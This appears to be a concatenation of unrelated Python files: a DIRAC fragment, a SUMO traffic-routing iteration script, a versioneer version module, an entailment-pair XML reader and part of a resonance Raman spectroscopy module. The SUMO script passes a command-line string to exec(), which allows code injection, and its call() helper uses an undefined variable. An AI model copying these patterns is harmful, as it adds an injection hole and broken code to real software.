outputFile.write( dir + '\n' )
outputFile.close()
gLogger.notice( '%d empty directories have been put in %s' % ( len( emptyDirs ), outputFileName ) )
DIRAC.exit( 0 )
|
"""
@file costFunctionChecker.py
@author Michael Behrisch
@author Daniel Krajzewicz
@author Jakob Erdmann
@date 2009-08-31
@version $Id: costFunctionChecker.py 13811 2013-05-01 20:31:43Z behrisch $
Run duarouter repeatedly and simulate weight changes via a cost function.
SUMO, Simulation of Urban MObility; see http://sumo.sourceforge.net/
Copyright (C) 2009-2013 DLR (http://www.dlr.de/) and contributors
All rights reserved
"""
import os, sys, subprocess, types
from datetime import datetime
from optparse import OptionParser
from xml.sax import make_parser, handler
def call(command, log):
if not isinstance(args, types.StringTypes):
command = [str(c) for c in command]
print >> log, "-" * 79
print >> log, command
log.flush()
retCode = subprocess.call(command, stdout=log, stderr=log)
if retCode != 0:
print >> sys.stderr, "Execution of %s failed. Look into %s for details." % (command, log.name)
sys.exit(retCode)
def writeRouteConf(step, options, file, output):
fd = open("iteration_" + str(step) + ".duarcfg", "w")
print >> fd, """<configuration>
<input>
<net-file value="%s"/>""" % options.net
if step==0:
if options.flows:
print >> fd, ' <flow-definition value="%s"/>' % file
else:
print >> fd, ' <trip-defs value="%s"/>' % file
else:
print >> fd, ' <alternatives value="%s"/>' % file
print >> fd, ' <weights value="dump_%s_%s.xml"/>' % (step-1, options.aggregation)
print >> fd, """ </input>
<output>
<output-file value="%s"/>
<exit-times value="True"/>
</output>""" % output
print >> fd, """ <processing>
<continue-on-unbuild value="%s"/>
<expand-weights value="True"/>
<gBeta value="%s"/>
<gA value="%s"/>
</processing>""" % (options.continueOnUnbuild, options.gBeta, options.gA)
print >> fd, ' <random_number><abs-rand value="%s"/></random_number>' % options.absrand
print >> fd, ' <time><begin value="%s"/>' % options.begin,
if options.end:
print >> fd, '<end value="%s"/>' % options.end,
print >> fd, """</time>
<report>
<verbose value="%s"/>
<suppress-warnings value="%s"/>
</report>
</configuration>""" % (options.verbose, options.noWarnings)
fd.close()
class RouteReader(handler.ContentHandler):
def __init__(self):
self._edgeWeights = {}
self._maxDepart = 0
def startElement(self, name, attrs):
if name == 'route':
for edge in attrs['edges'].split():
if not edge in self._edgeWeights:
self._edgeWeights[edge] = 0
self._edgeWeights[edge] += 1
elif name == 'vehicle':
if float(attrs['depart']) > self._maxDepart:
self._maxDepart = float(attrs['depart'])
def getWeight(self, edge):
return self._edgeWeights.get(edge, 0)
def getMaxDepart(self):
return self._maxDepart
class NetReader(handler.ContentHandler):
def __init__(self):
self._edges = []
def startElement(self, name, attrs):
if name == 'edge':
if not attrs.has_key('function') or attrs['function'] == 'normal':
self._edges.append(attrs['id'])
def getEdges(self):
return self._edges
def identity(edge, weight):
return weight
def generateWeights(step, options, edges, weights, costFunction):
fd = open("dump_%s_%s.xml" % (step, options.aggregation), "w")
print >> fd, '<?xml version="1.0"?>\n<netstats>'
for time in range(0, int(reader.getMaxDepart()+1), options.aggregation):
print >> fd, ' <interval begin="%s" end="%s" id="dump_%s">' % (time, time + options.aggregation, options.aggregation)
for edge in edges:
cost = costFunction(edge, weights.getWeight(edge))
if cost != None:
print >> fd, ' <edge id="%s" traveltime="%s"/>' % (edge, cost)
print >> fd, ' </interval>'
print >> fd, '</netstats>'
fd.close()
optParser = OptionParser()
optParser.add_option("-v", "--verbose", action="store_true", dest="verbose",
default=False, help="tell me what you are doing")
optParser.add_option("-C", "--continue-on-unbuild", action="store_true", dest="continueOnUnbuild",
default=False, help="continues on unbuild routes")
optParser.add_option("-w", "--disable-warnings", action="store_true", dest="noWarnings",
default=False, help="disables warnings")
optParser.add_option("-n", "--net-file", dest="net",
help="SUMO network (mandatory)", metavar="FILE")
optParser.add_option("-t", "--trips", dest="trips",
help="trips in step 0 (this or flows is mandatory)", metavar="FILE")
optParser.add_option("-F", "--flows",
help="flows in step 0 (this or trips is mandatory)", metavar="FILE")
optParser.add_option("-+", "--additional", dest="additional",
default="", help="Additional files")
optParser.add_option("-b", "--begin", dest="begin",
type="int", default=0, help="Set simulation/routing begin [default: %default]")
optParser.add_option("-e", "--end", dest="end",
type="int", help="Set simulation/routing end [default: %default]")
optParser.add_option("-R", "--route-steps", dest="routeSteps",
type="int", default=200, help="Set simulation route steps [default: %default]")
optParser.add_option("-a", "--aggregation", dest="aggregation",
type="int", default=900, help="Set main weights aggregation period [default: %default]")
optParser.add_option("-A", "--gA", dest="gA",
type="float", default=.5, help="Sets Gawron's Alpha [default: %default]")
optParser.add_option("-B", "--gBeta", dest="gBeta",
type="float", default=.9, help="Sets Gawron's Beta [default: %default]")
optParser.add_option("-f", "--first-step", dest="firstStep",
type="int", default=0, help="First DUA step [default: %default]")
optParser.add_option("-l", "--last-step", dest="lastStep",
type="int", default=50, help="Last DUA step [default: %default]")
optParser.add_option("-p", "--path", dest="path",
default=os.environ.get("SUMO_BINDIR", ""), help="Path to binaries [default: %default]")
optParser.add_option("-y", "--absrand", dest="absrand", action="store_true",
default=False, help="use current time to generate random number")
optParser.add_option("-c", "--cost-function", dest="costfunc",
default="identity", help="(python) function to use as cost function")
(options, args) = optParser.parse_args()
if not options.net or not (options.trips or options.flows):
optParser.error("At least --net-file and --trips or --flows have to be given!")
duaBinary = os.environ.get("DUAROUTER_BINARY", os.path.join(options.path, "duarouter"))
log = open("dua-log.txt", "w+")
parser = make_parser()
reader = NetReader()
parser.setContentHandler(reader)
parser.parse(options.net)
edges = reader.getEdges()
if "." in options.costfunc:
idx = options.costfunc.rfind(".")
module = options.costfunc[:idx]
func = options.costfunc[idx+1:]
exec("from %s import %s as costFunction" % (module, func))
else:
exec("costFunction = %s" % options.costfunc)
if options.flows:
tripFiles = options.flows.split(",")
else:
tripFiles = options.trips.split(",")
starttime = datetime.now()
for step in range(options.firstStep, options.lastStep):
btimeA = datetime.now()
print "> Executing step " + str(step)
# router
files = []
for tripFile in tripFiles:
file = tripFile
tripFile = os.path.basename(tripFile)
if step>0:
file = tripFile[:tripFile.find(".")] + "_%s.rou.alt.xml" % (step-1)
output = tripFile[:tripFile.find(".")] + "_%s.rou.xml" % step
print ">> Running router with " + file
btime = datetime.now()
print ">>> Begin time: %s" % btime
writeRouteConf(step, options, file, output)
retCode = call([duaBinary, "-c", "iteration_%s.duarcfg" % step], log)
etime = datetime.now()
print ">>> End time: %s" % etime
print ">>> Duration: %s" % (etime-btime)
print "<<"
files.append(output)
# generating weights file
print ">> Generating weights"
reader = RouteReader()
parser.setContentHandler(reader)
for f in files:
parser.parse(f)
generateWeights(step, options, edges, reader, costFunction)
print "<<"
print "< Step %s ended (duration: %s)" % (step, datetime.now() - btimeA)
print "------------------\n"
sys.stdout.flush()
print "dua-iterate ended (duration: %s)" % (datetime.now() - starttime)
log.close()
|
"""Git implementation of _version.py."""
import errno
import os
import re
import subprocess
import sys
def get_keywords():
"""Get the keywords needed to look up the version information."""
# these strings will be replaced by git during git-archive.
# setup.py/versioneer.py will grep for the variable names, so they must
# each be defined on a line of their own. _version.py will just call
# get_keywords().
git_refnames = "$Format:%d$"
git_full = "$Format:%H$"
git_date = "$Format:%ci$"
keywords = {"refnames": git_refnames, "full": git_full, "date": git_date}
return keywords
class VersioneerConfig:
"""Container for Versioneer configuration parameters."""
def get_config():
"""Create, populate and return the VersioneerConfig() object."""
# these strings are filled in when 'setup.py versioneer' creates
# _version.py
cfg = VersioneerConfig()
cfg.VCS = "git"
cfg.style = ""
cfg.tag_prefix = ""
cfg.parentdir_prefix = "None"
cfg.versionfile_source = "datapoint/_version.py"
cfg.verbose = False
return cfg
class NotThisMethod(Exception):
"""Exception raised if a method is not valid for the current scenario."""
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
"""Decorator to mark a method as the handler for a particular VCS."""
def decorate(f):
"""Store f in HANDLERS[vcs][method]."""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False,
env=None):
"""Call the given command(s)."""
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen([c] + args, cwd=cwd, env=env,
stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr
else None))
break
except EnvironmentError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print("unable to run %s" % dispcmd)
print(e)
return None, None
else:
if verbose:
print("unable to find command, tried %s" % (commands,))
return None, None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print("unable to run %s (error)" % dispcmd)
print("stdout was %s" % stdout)
return None, p.returncode
return stdout, p.returncode
def versions_from_parentdir(parentdir_prefix, root, verbose):
"""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes both
the project name and a version string. We will also support searching up
two directory levels for an appropriately named parent directory
"""
rootdirs = []
for i in range(3):
dirname = os.path.basename(root)
if dirname.startswith(parentdir_prefix):
return {"version": dirname[len(parentdir_prefix):],
"full-revisionid": None,
"dirty": False, "error": None, "date": None}
else:
rootdirs.append(root)
root = os.path.dirname(root) # up a level
if verbose:
print("Tried directories %s but none started with prefix %s" %
(str(rootdirs), parentdir_prefix))
raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
"""Extract version information from the given file."""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, "r")
for line in f.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
if line.strip().startswith("git_date ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["date"] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
"""Get version information from git keywords."""
if not keywords:
raise NotThisMethod("no keywords at all, weird")
date = keywords.get("date")
if date is not None:
# git-2.2.0 added "%cI", which expands to an ISO-8601 -compliant
# datestamp. However we prefer "%ci" (which expands to an "ISO-8601
# -like" string, which we must then edit to make compliant), because
# it's been around since git-1.5.3, and it's too difficult to
# discover which version we're using, or to work around using an
# older one.
date = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print("discarding '%s', no digits" % ",".join(refs - tags))
if verbose:
print("likely tags: %s" % ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print("picking %s" % r)
return {"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": None,
"date": date}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": "no suitable tags", "date": None}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
"""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py hasn't already been rewritten with a short
version string, meaning we're inside a checked out source tree.
"""
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
out, rc = run_command(GITS, ["rev-parse", "--git-dir"], cwd=root,
hide_stderr=True)
if rc != 0:
if verbose:
print("Directory %s not under git control" % root)
raise NotThisMethod("'git rev-parse --git-dir' returned error")
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there isn't one, this yields HEX[-dirty] (no NUM)
describe_out, rc = run_command(GITS, ["describe", "--tags", "--dirty",
"--always", "--long",
"--match", "%s*" % tag_prefix],
cwd=root)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out, rc = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[:git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces["error"] = ("unable to parse git-describe output: '%s'"
% describe_out)
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%s' doesn't start with prefix '%s'"
print(fmt % (full_tag, tag_prefix))
pieces["error"] = ("tag '%s' doesn't start with prefix '%s'"
% (full_tag, tag_prefix))
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix):]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out, rc = run_command(GITS, ["rev-list", "HEAD", "--count"],
cwd=root)
pieces["distance"] = int(count_out) # total number of commits
# commit date: see ISO-8601 comment in git_versions_from_keywords()
date = run_command(GITS, ["show", "-s", "--format=%ci", "HEAD"],
cwd=root)[0].strip()
pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
return pieces
def plus_or_dot(pieces):
"""Return a + if we don't already have one, else return a ."""
if "+" in pieces.get("closest-tag", ""):
return "."
return "+"
def render_pep440(pieces):
"""Build up version string, with post-release "local version identifier".
Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
Exceptions:
1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += plus_or_dot(pieces)
rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0+untagged.%d.g%s" % (pieces["distance"],
pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
def render_pep440_pre(pieces):
"""TAG[.post.devDISTANCE] -- No -dirty.
Exceptions:
1: no tags. 0.post.devDISTANCE
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += ".post.dev%d" % pieces["distance"]
else:
# exception #1
rendered = "0.post.dev%d" % pieces["distance"]
return rendered
def render_pep440_post(pieces):
"""TAG[.postDISTANCE[.dev0]+gHEX] .
The ".dev0" means dirty. Note that .dev0 sorts backwards
(a dirty tree will appear "older" than the corresponding clean one),
but you shouldn't be releasing software with -dirty anyways.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%s" % pieces["short"]
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += "+g%s" % pieces["short"]
return rendered
def render_pep440_old(pieces):
"""TAG[.postDISTANCE[.dev0]] .
The ".dev0" means dirty.
Eexceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
return rendered
def render_git_describe(pieces):
"""TAG[-DISTANCE-gHEX][-dirty].
Like 'git describe --tags --dirty --always'.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render_git_describe_long(pieces):
"""TAG-DISTANCE-gHEX[-dirty].
Like 'git describe --tags --dirty --always -long'.
The distance/hash is unconditional.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render(pieces, style):
"""Render the given version pieces into the requested style."""
if pieces["error"]:
return {"version": "unknown",
"full-revisionid": pieces.get("long"),
"dirty": None,
"error": pieces["error"],
"date": None}
if not style or style == "default":
style = "pep440" # the default
if style == "pep440":
rendered = render_pep440(pieces)
elif style == "pep440-pre":
rendered = render_pep440_pre(pieces)
elif style == "pep440-post":
rendered = render_pep440_post(pieces)
elif style == "pep440-old":
rendered = render_pep440_old(pieces)
elif style == "git-describe":
rendered = render_git_describe(pieces)
elif style == "git-describe-long":
rendered = render_git_describe_long(pieces)
else:
raise ValueError("unknown style '%s'" % style)
return {"version": rendered, "full-revisionid": pieces["long"],
"dirty": pieces["dirty"], "error": None,
"date": pieces.get("date")}
def get_versions():
"""Get version information or return default if unable to do so."""
# I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
# __file__, we can work backwards from there to the root. Some
# py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
# case we can only use expanded keywords.
cfg = get_config()
verbose = cfg.verbose
try:
return git_versions_from_keywords(get_keywords(), cfg.tag_prefix,
verbose)
except NotThisMethod:
pass
try:
root = os.path.realpath(__file__)
# versionfile_source is the relative path from the top of the source
# tree (where the .git directory might live) to this file. Invert
# this to find the root from __file__.
for i in cfg.versionfile_source.split('/'):
root = os.path.dirname(root)
except NameError:
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to find root of source tree",
"date": None}
try:
pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
return render(pieces, cfg.style)
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
except NotThisMethod:
pass
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to compute version", "date": None}
|
"""
Common structures and functions used by other scripts.
"""
from xml.etree import cElementTree as ET
str_to_entailment = {'none': 0,
'entailment': 1,
'paraphrase': 2}
entailment_to_str = {v: k for k, v in str_to_entailment.items()}
class Pair(object):
'''
Class representing a pair of texts from SICK or RTE.
It is meant to be used as an abstract representation for both.
'''
def __init__(self, t, h, id_, entailment, similarity):
'''
:param t: string with the text
:param h: string with the hypothesis
:param id_: int indicating id in the original file
:param entailment: int indicating entailment class
:param similarity: float
'''
self.t = t
self.h = h
self.id = id_
self.entailment = entailment
self.similarity = similarity
def read_xml(filename, need_labels):
'''
Read an RTE XML file and return a list of Pair objects.
:param filename: name of the file to read
:param need_labels: boolean indicating if labels should be present
'''
pairs = []
tree = ET.parse(filename)
root = tree.getroot()
for xml_pair in root.iter('pair'):
t = xml_pair.find('t').text
h = xml_pair.find('h').text
attribs = dict(xml_pair.items())
id_ = int(attribs['id'])
if 'entailment' in attribs:
ent_string = attribs['entailment'].lower()
try:
ent_value = str_to_entailment[ent_string]
except ValueError:
msg = 'Unexpected value for attribute "entailment" at pair {}: {}'
raise ValueError(msg.format(id_, ent_string))
else:
ent_value = None
if 'similarity' in attribs:
similarity = float(attribs['similarity'])
else:
similarity = None
if need_labels and similarity is None and ent_value is None:
msg = 'Missing both entailment and similarity values for pair {}'.format(id_)
raise ValueError(msg)
pair = Pair(t, h, id_, ent_value, similarity)
pairs.append(pair)
return pairs
|
from edges import EdgeExtractor
from extractor import Extractor
from parambfs import ParamExtractor
|
"""
.. module: FSRStools.rraman
:platform: Windows
.. moduleauthor:: Daniel Dietze <daniel.dietze@berkeley.edu>
Resonance Raman excitation profile calculation based on the time-domain picture of resonance Raman. See Myers and Mathies in *Biological Applications of Raman Spectroscopy*, Vol. 2, pp. 1-58 (John Wiley and Sons, New York, 1987) for details (referred to as Myers in the following). The code is mainly based on Myers' Fortran 77 code (see Appendix of PhD Thesis of K. M. Spillane, 2011, UC Berkeley for source code).
**Changelog:**
*10-7-2015:*
- Added / modified functions for calculating fluorescence spectra.
- Added a convenience function to calculate Raman spectra from a set of excitation profiles.
- Added some more damping functions and phenomenological support for Stokes shift in simple homogeneous damping function.
*10-21-2015:*
- Some bug fixes concerning the prefactors and the normalization of the fluorescence spectra.
- Fixed a bug regarding the Raman overlaps.
**Example Code**
Here is a short example calculating Myers' *Gedankenmolecule* from Myers and Mathies::
import numpy as np
import FSRStools.rraman as rr
# parameters:
# -----------
# displacements
D = np.array([1.27, 0.3, 0.7, 0.53])
# ground state frequencies
RMg = np.array([1550.0, 1300.0, 1150.0, 1000.0])
# excited state frequencies
RMe = np.array([1550.0, 1300.0, 1150.0, 1000.0])
# electronic zero-zero energy
E0 = 20700.0
# homogeneous linewidth and shape parameter
Gamma = 200.0
halpha = 0
# inhomogeneous linewidth and shape parameter
sig = 400.0
ialpha = 1
# electronic transition dipole length
M = 0.8
# index of refraction of surrounding medium
IOR = 1.0
# time axis parameters for integrations
tmax = 5000
dt = 0.2
# just calculate fundamentals
nquanta = np.identity(len(RMg))
sshift = np.dot(nquanta, RMg)
# calculation part
# ----------------
# create axes
t, wn = rr.getAxes(tmax, dt)
# zero-zero energy and damping
# add here all time domain stuff
TDpart = rr.getHomogeneousDamping(t, Gamma, halpha)
# time dependent overlap integrals
OVLPS = rr.getOverlaps(t, D, RMg, RMe, nquanta)
# calculate cross-sections
sigmaA, sigmaR, kF = rr.getCrossSections(t, wn, E0, OVLPS, sshift, M, IOR, TDpart, sig, ialpha)
..
This file is part of the FSRStools python module.
The FSRStools python module is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
The FSRStools python module is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with the FSRStools python module. If not, see <http://www.gnu.org/licenses/>.
Copyright 2014, 2015 Daniel Dietze <daniel.dietze@berkeley.edu>.
"""
import numpy as np
hbar = 5308.880986 #: Planck's constant over 2 pi, hbar, in `cm-1 fs`
c0 = 2.99792458e-5 #: speed of light in `cm / fs`
kB = 0.695 #: Boltzman's constant in `cm-1 / K`
def radperfs2wn(w):
"""Angular frequency (rad / fs) to wavenumber (cm-1).
"""
return hbar * w
def wn2radperfs(e):
"""Wavenumber (cm-1) to angular frequency (rad / fs).
"""
return e / hbar
def wn2lambda(w):
"""Convert wavenumber (cm-1) to wavelength (nm).
"""
return 1e7 / w
def lambda2wn(w):
"""Convert wavelength (nm) to wavenumber (cm-1).
"""
return 1e7 / w
def getWnIndex(wn, wn0):
"""Get the index into an array of wavenumbers wn with wavenumber closest to wn0. Use this function for :py:func:`getRamanSpectrum`.
"""
if np.amin(wn) > wn0 or np.amax(wn) < wn0:
print "Warning: wn0 lies outside of wn."
return np.argmin(np.absolute(wn - wn0))
def getAxes(tmax, dt):
"""Create time and frequency axes for the resonance Raman calculations.
:param float tmax: Endpoint for time domain calculation (fs). This value should be high enough to capture the full dephasing.
:param float dt: Increment of time axis (fs). This value should be small enough to capture the highest vibronic feature in the excited state.
:returns: Time axis (fs) and frequency axis (cm-1).
"""
t = np.arange(0, tmax + dt, dt)
numPoints = len(t)
wn = np.arange(numPoints) / (c0 * dt * numPoints)
return t, wn
def molarExtinction2AbsCS(eSpctr, IOR):
"""Convert molar extinction (cm-1 / M) to molecular absorption cross section (A**2 / molec).
See McHale, Resonance Raman Spectroscopy, Wiley, (2002), p. 545 or Myers & Mathies for details. The absorption cross section in solution has to be scaled by index of refraction unless the molar extinction has not been corrected.
:param array eSpctr: Extinction spectrum in (cm-1 / M).
:param float IOR: Index of refraction of surrounding solvent / medium.
:returns: Absorption spectrum in units of (A**2 / molec.), same shape as eSpcrt.
"""
return 1e3 * np.log(10.0) * eSpctr / 6.0221e23 * 1e8 * 1e8 / IOR
def diff2absRamanCS(diffRaCS, rho):
"""Convert the differential Raman cross section (A**2/molec sr) to absolute Raman cross section in (A**2 / molec) for a given depolarization ratio rho.
:param float diffRaCS: Differential Raman cross section (A**2/molec sr).
:param float rho: Associated depolarization ratio of this Raman mode.
:returns: Absolute Raman cross section in (A**2 / molec).
"""
return 8.0 * np.pi / 3.0 * (1.0 + 2.0 * rho) / (1.0 + rho) * diffRaCS
def getRamanSpectrum(wn, iEL, RMg, nquanta, sigmaR, dw=10.0, alpha=0):
"""
Convenience function to calculate the Raman spectrum. The spectrum is scattered power per infinitesimal frequency normalized to incident power times molecular density (cm-3) times path length (cm). See Myers, *Chem. Phys.* **180**, 215 (1994), Eq. 7 for details.
:param array wn: Wavenumber axis (Stokes shift, not electronic).
:param int iEL: Index into sigmaR corresponding to the pump energy of the laser.
:param array RMg: Ground state Raman frequencies
:param array nquanta: M x N array containing the quanta of the N possible Raman modes for the M Raman lines to calculate. Use :py:func:`numpy.identity` to just calculate the fundamentals. Possible values are 0, 1, 2.
:param array sigmaR: Array of M Raman cross sections that have been calculated by :py:func:`getCrossSections` (in A**2 / molec).
:param float dw: Phenomenological FWHM linewidth of the Raman lines in cm-1 (default = 10 cm-1).
:param float alpha: Line shape parameter to be used for the Raman spectrum:
- 1 = Gaussian
- 0 = Lorentzian (default)
:returns: Calculated Raman spectrum (same shape as wn).
"""
spectrum = np.zeros(len(wn))
if iEL < 0 or iEL >= len(sigmaR[0]):
print "Error: iEL is out of range!"
return spectrum
# iterate over all M modes
for i, nM in enumerate(nquanta):
# get frequency of this mode
wR = np.sum(nM * RMg)
# add Lorentzian part of lineshape
spectrum = spectrum + (1.0 - alpha) * sigmaR[i][iEL] * 1e-16 * (dw / (2.0 * np.pi * ((wn - wR)**2 + dw**2 / 4.0)))
# add Gaussian part of lineshape
spectrum = spectrum + alpha * sigmaR[i][iEL] * 1e-16 * ((2.0 * np.sqrt(np.log(2) / np.pi)) / dw * np.exp(-4.0 * np.log(2.0) * (wn - wR)**2 / dw**2))
return spectrum
def t00A(t, Delta, eVIB):
"""Time dependent overlap integral between vibrational ground states of electronic ground and excited state with equal ground and excited state vibrational frequencies.
:param array t: Time axis in (fs).
:param float Delta: Displacement of excited state potential energy surface along this vibrational coordinate in dimensionless coordinates.
:param float eVIB: Vibrational frequency (cm-1).
:returns: 0-0 overlap integral as function of time (same shape as t).
.. seealso:: Myers, Eqs. (37) - (39).
"""
# The 0-0 overlap does not contain the factors :math:`e^{-j w_{VIB} t}` nor :math:`e^{-j E_0 / \\hbar t}` as these are taken care of when assembling the cross section.
return np.exp(-Delta**2 / 2.0 * (1.0 - np.exp(-1j * eVIB / hbar * t)))
def t10A(t, Delta, eVIB):
"""Time dependent overlap integral between vibrational ground and first excited state of electronic ground and excited state with equal ground and excited state vibrational frequencies.
:param array t: Time axis in (fs).
:param float Delta: Displacement of excited state potential energy surface along this vibrational coordinate in dimensionless coordinates.
:param float eVIB: Vibrational frequency (cm-1).
:returns: 1-0 overlap integral as function of time (same shape as t).
.. seealso:: Myers, Eqs. (37) - (39).
"""
return Delta / np.sqrt(2) * (np.exp(-1j * eVIB / hbar * t) - 1.0) # * t00A(t, Delta, eVIB)
def t20A(t, Delta, eVIB):
"""Time dependent overlap integral between vibrational ground and second excited state of electronic ground and excited state with equal ground and excited state vibrational frequencies.
:param array t: Time axis in (fs).
:param float Delta: Displacement of excited state potential energy surface along this vibrational coordinate in dimensionless coordinates.
:param float eVIB: Vibrational frequency (cm-1).
:returns: 2-0 overlap integral as function of time (same shape as t).
.. seealso:: Myers, Eqs. (37) - (39).
"""
return Delta**2 / (2 * np.sqrt(2)) * (np.exp(-1j * eVIB / hbar * t) - 1.0)**2 # * t00A(t, Delta, eVIB)
def t00B(t, Delta, eg, ee):
"""Time dependent overlap integral between vibrational ground states of electronic ground and excited state with different ground and excited state vibrational frequencies.
:param array t: Time axis in (fs).
:param float Delta: Displacement of excited state potential energy surface along this vibrational coordinate in dimensionless coordinates.
:param float eg: Vibrational frequency in the ground state (cm-1).
:param float ee: Vibrational frequency in the excited state (cm-1).
